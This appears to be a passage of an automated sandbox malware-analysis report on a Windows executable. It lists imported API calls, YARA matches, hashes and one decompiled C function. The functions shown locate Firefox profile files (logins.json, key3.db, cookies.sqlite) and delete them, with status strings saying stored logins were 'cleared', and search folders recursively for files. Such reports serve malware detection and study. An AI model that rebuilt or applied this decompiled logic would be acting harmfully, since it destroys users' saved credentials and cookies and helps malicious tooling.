                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                  • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                  • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                  • String ID:
                                  • API String ID: 2968164691-0
                                  • Opcode ID: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                  • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                  • Opcode Fuzzy Hash: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                  • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040728F, Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 206fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 004072A1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072AE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004072BB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 004072CD
                                  • getenv.MSVCRT ref: 004072D9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 004072E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004072F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407303
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040731D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 00407327
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 0040732E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 0040733A
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 00407348
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox StoredLogins not found],00000000), ref: 0040735C
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 0040737F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\logins.json,?,?,?), ref: 0040741E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\logins.json,?,?,?), ref: 0040742B
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\logins.json,?,?,?), ref: 00407437
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407440
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\logins.json,?,?,?), ref: 00407449
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407463
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407470
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040747C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407485
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 0040748E
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 00407497
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\key3.db,?,?,?,?,?,\logins.json,?,?,?), ref: 004074A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 004074FD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00407506
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 0040750F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 3375041920-3681987949
                                  • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                  • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                  • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040751B, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                  • getenv.MSVCRT ref: 00407558
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                  • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                  • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                  • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                  • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                    • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                    • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 2907366228-432212279
                                  • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                  • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                  • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404C0A, Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
				L00414146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L0041414C();
						L00414152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E00412855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L00414140();
						L00414140();
						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                  0x00404c16
                                  0x00404c18
                                  0x00404c1f
                                  0x00404c2f
                                  0x00404c39
                                  0x00404c43
                                  0x00404c4a
                                  0x00404c66
                                  0x00404c6b
                                  0x00404c70
                                  0x00404c80
                                  0x00404c83
                                  0x00404c8d
                                  0x00404e83
                                  0x00404e86
                                  0x00404e8f
                                  0x00404e98
                                  0x00000000
                                  0x00404e9e
                                  0x00404c93
                                  0x00404cb2
                                  0x00404cfa
                                  0x00404d0c
                                  0x00404d19
                                  0x00404d27
                                  0x00404d30
                                  0x00404d3f
                                  0x00404d45
                                  0x00404d4e
                                  0x00404d56
                                  0x00404d5e
                                  0x00404d5e
                                  0x00404d6b
                                  0x00404d72
                                  0x00404d7c
                                  0x00404d86
                                  0x00404d90
                                  0x00404d97
                                  0x00404d9c
                                  0x00404d9f
                                  0x00404da8
                                  0x00404db6
                                  0x00404e44
                                  0x00404e47
                                  0x00000000
                                  0x00404dbc
                                  0x00404dc3
                                  0x00404dcf
                                  0x00404dd9
                                  0x00404de2
                                  0x00404ded
                                  0x00404df0
                                  0x00404e00
                                  0x00404e08
                                  0x00404e0c
                                  0x00404e16
                                  0x00404e20
                                  0x00404e25
                                  0x00404e31
                                  0x00404e3a
                                  0x00404e42
                                  0x00404e55
                                  0x00404e5e
                                  0x00404e67
                                  0x00404e70
                                  0x00000000
                                  0x00404e76
                                  0x00000000
                                  0x00404e42
                                  0x00404db6
                                  0x00404e7d
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                  • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                  • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                  • wcscmp.MSVCRT ref: 00404CCA
                                  • wcscmp.MSVCRT ref: 00404CE2
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                    • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                    • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
